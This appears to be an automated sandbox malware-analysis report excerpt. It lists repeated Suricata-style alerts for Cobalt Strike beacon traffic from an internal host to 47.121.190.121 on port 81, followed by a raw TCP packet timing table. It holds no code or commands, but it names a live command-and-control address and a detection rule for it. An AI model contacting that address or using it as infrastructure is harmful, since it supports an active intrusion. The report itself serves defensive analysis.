2025-01-09T23:09:45.528453+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50142	47.121.190.121	81	TCP
2025-01-09T23:09:46.600344+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50143	47.121.190.121	81	TCP
2025-01-09T23:09:47.667071+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50144	47.121.190.121	81	TCP
2025-01-09T23:09:48.750129+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50145	47.121.190.121	81	TCP
2025-01-09T23:09:49.825052+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50146	47.121.190.121	81	TCP
2025-01-09T23:09:50.897630+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50147	47.121.190.121	81	TCP
2025-01-09T23:09:51.951336+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50148	47.121.190.121	81	TCP
2025-01-09T23:09:53.012152+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50149	47.121.190.121	81	TCP
2025-01-09T23:09:54.105508+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50150	47.121.190.121	81	TCP
2025-01-09T23:09:55.172245+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50151	47.121.190.121	81	TCP
2025-01-09T23:09:56.248402+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50152	47.121.190.121	81	TCP
2025-01-09T23:09:57.320936+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50153	47.121.190.121	81	TCP
2025-01-09T23:09:58.406051+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50154	47.121.190.121	81	TCP
2025-01-09T23:09:59.544603+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50155	47.121.190.121	81	TCP
2025-01-09T23:10:00.607551+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50156	47.121.190.121	81	TCP
2025-01-09T23:10:01.687567+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50157	47.121.190.121	81	TCP
2025-01-09T23:10:02.764362+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50158	47.121.190.121	81	TCP
2025-01-09T23:10:03.902602+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50159	47.121.190.121	81	TCP
2025-01-09T23:10:04.988274+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50160	47.121.190.121	81	TCP
2025-01-09T23:10:06.041816+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50161	47.121.190.121	81	TCP
2025-01-09T23:10:07.104289+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50162	47.121.190.121	81	TCP
2025-01-09T23:10:08.215749+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50163	47.121.190.121	81	TCP
2025-01-09T23:10:09.292722+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50164	47.121.190.121	81	TCP
2025-01-09T23:10:10.362812+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50165	47.121.190.121	81	TCP
2025-01-09T23:10:11.451556+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50166	47.121.190.121	81	TCP
2025-01-09T23:10:12.535947+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50167	47.121.190.121	81	TCP
2025-01-09T23:10:13.643758+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50168	47.121.190.121	81	TCP
2025-01-09T23:10:14.719532+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50169	47.121.190.121	81	TCP
2025-01-09T23:10:15.779461+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50170	47.121.190.121	81	TCP
2025-01-09T23:10:16.845496+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50171	47.121.190.121	81	TCP
2025-01-09T23:10:17.901547+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50172	47.121.190.121	81	TCP
2025-01-09T23:10:18.969304+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50173	47.121.190.121	81	TCP
2025-01-09T23:10:20.020527+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50174	47.121.190.121	81	TCP
2025-01-09T23:10:21.095492+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50175	47.121.190.121	81	TCP
2025-01-09T23:10:22.147598+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50176	47.121.190.121	81	TCP
2025-01-09T23:10:23.200153+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50177	47.121.190.121	81	TCP
2025-01-09T23:10:24.302444+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50178	47.121.190.121	81	TCP
2025-01-09T23:10:25.460376+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50179	47.121.190.121	81	TCP
2025-01-09T23:10:26.513953+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50180	47.121.190.121	81	TCP
2025-01-09T23:10:27.607746+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50181	47.121.190.121	81	TCP
2025-01-09T23:10:28.689992+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50182	47.121.190.121	81	TCP
2025-01-09T23:10:29.749808+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50183	47.121.190.121	81	TCP
2025-01-09T23:10:30.812475+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50184	47.121.190.121	81	TCP
2025-01-09T23:10:31.863180+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50185	47.121.190.121	81	TCP
2025-01-09T23:10:32.953635+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50186	47.121.190.121	81	TCP
2025-01-09T23:10:34.075897+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50187	47.121.190.121	81	TCP
2025-01-09T23:10:35.171919+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50188	47.121.190.121	81	TCP
2025-01-09T23:10:36.229509+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50189	47.121.190.121	81	TCP
2025-01-09T23:10:37.283224+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50190	47.121.190.121	81	TCP
2025-01-09T23:10:38.336978+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50191	47.121.190.121	81	TCP
2025-01-09T23:10:39.413620+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50192	47.121.190.121	81	TCP
2025-01-09T23:10:40.483638+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50193	47.121.190.121	81	TCP
2025-01-09T23:10:41.529468+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50194	47.121.190.121	81	TCP
2025-01-09T23:10:42.614080+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50195	47.121.190.121	81	TCP
2025-01-09T23:10:43.693459+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50196	47.121.190.121	81	TCP
2025-01-09T23:10:44.769386+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50197	47.121.190.121	81	TCP
2025-01-09T23:10:45.838150+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50198	47.121.190.121	81	TCP
2025-01-09T23:10:46.905002+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50199	47.121.190.121	81	TCP
2025-01-09T23:10:48.170618+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50200	47.121.190.121	81	TCP
2025-01-09T23:10:49.232009+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50201	47.121.190.121	81	TCP
2025-01-09T23:10:50.315464+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50202	47.121.190.121	81	TCP
2025-01-09T23:10:51.365714+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50203	47.121.190.121	81	TCP
2025-01-09T23:10:52.456858+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50204	47.121.190.121	81	TCP
2025-01-09T23:10:53.516487+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50205	47.121.190.121	81	TCP
2025-01-09T23:10:54.607904+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50206	47.121.190.121	81	TCP
2025-01-09T23:10:55.687630+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50207	47.121.190.121	81	TCP
2025-01-09T23:10:56.768150+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50208	47.121.190.121	81	TCP
2025-01-09T23:10:57.865174+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50209	47.121.190.121	81	TCP
2025-01-09T23:10:58.940968+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50210	47.121.190.121	81	TCP
2025-01-09T23:11:00.020036+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50211	47.121.190.121	81	TCP
2025-01-09T23:11:01.097549+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50212	47.121.190.121	81	TCP
2025-01-09T23:11:02.185724+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50213	47.121.190.121	81	TCP
2025-01-09T23:11:03.430333+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50214	47.121.190.121	81	TCP
2025-01-09T23:11:04.483712+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50215	47.121.190.121	81	TCP
2025-01-09T23:11:05.608070+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50216	47.121.190.121	81	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 23:06:59.443187952 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:06:59.448380947 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:06:59.448450089 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:06:59.448566914 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:06:59.454478025 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381597042 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381674051 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381706953 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381743908 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381761074 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381777048 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381786108 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381810904 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381820917 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381843090 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381853104 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381875038 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381884098 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381906986 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381915092 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381938934 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381948948 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.381973982 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.381984949 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.382018089 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.386802912 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.386859894 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.386881113 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.386915922 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.386971951 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.387021065 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.627815962 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.627860069 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.627887964 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.627911091 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.627918959 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.627948999 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.627964020 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.627980947 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628000021 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628032923 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628043890 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628067970 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628068924 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628106117 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628473997 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628518105 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628525972 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628561020 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628562927 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628593922 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628597975 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628628016 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.628634930 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.628664017 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629154921 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.629198074 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629205942 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.629239082 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.629247904 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629272938 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.629277945 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629308939 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.629311085 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629348993 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.629982948 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630027056 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.630033016 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630067110 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630079031 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.630099058 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630109072 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.630134106 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630140066 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.630172968 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.630824089 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.630868912 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.632872105 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.632924080 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.632927895 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.632967949 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.633053064 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.633095026 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.714560032 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.714613914 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.714632034 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.714665890 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.873845100 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873861074 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873881102 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873893023 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873903990 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873917103 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.873929024 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.873964071 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874015093 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874053955 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874099016 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874110937 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874121904 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874171019 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874171019 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874340057 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874357939 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874370098 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874381065 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874383926 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874392986 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874413013 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874413013 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874428988 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874759912 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874771118 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874783039 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874793053 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874804020 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874814034 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874826908 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.874829054 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874836922 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874845028 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.874875069 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875153065 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875164032 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875175953 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875197887 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875221014 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875226021 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875236988 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875247955 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875260115 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875262976 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875291109 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875294924 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875302076 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875303030 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875322104 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875329971 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875334024 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875341892 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.875350952 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.875401974 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876106977 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876125097 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876135111 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876144886 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876157999 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876163006 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876169920 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876172066 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876197100 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876218081 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876259089 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876271009 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876281977 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876293898 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876300097 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876305103 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876311064 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876317978 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.876367092 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.876367092 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.877063036 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.877074003 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.877085924 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.877094030 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.877109051 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.877123117 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.877145052 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:00.960591078 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.960609913 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:00.960685968 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120279074 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120331049 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120394945 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120398045 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120450020 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120467901 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120485067 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120518923 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120549917 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120572090 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120583057 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120615005 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120621920 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120665073 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120677948 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120695114 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120737076 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120750904 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120800018 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120826960 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120830059 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120851994 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120863914 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120876074 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120894909 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120907068 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120928049 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120934963 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120963097 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.120966911 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.120995045 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121005058 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121026993 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121032953 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121058941 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121062994 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121090889 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121105909 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121124029 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121138096 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121155977 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121159077 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121189117 CET	81	49730	47.121.190.121	192.168.2.4
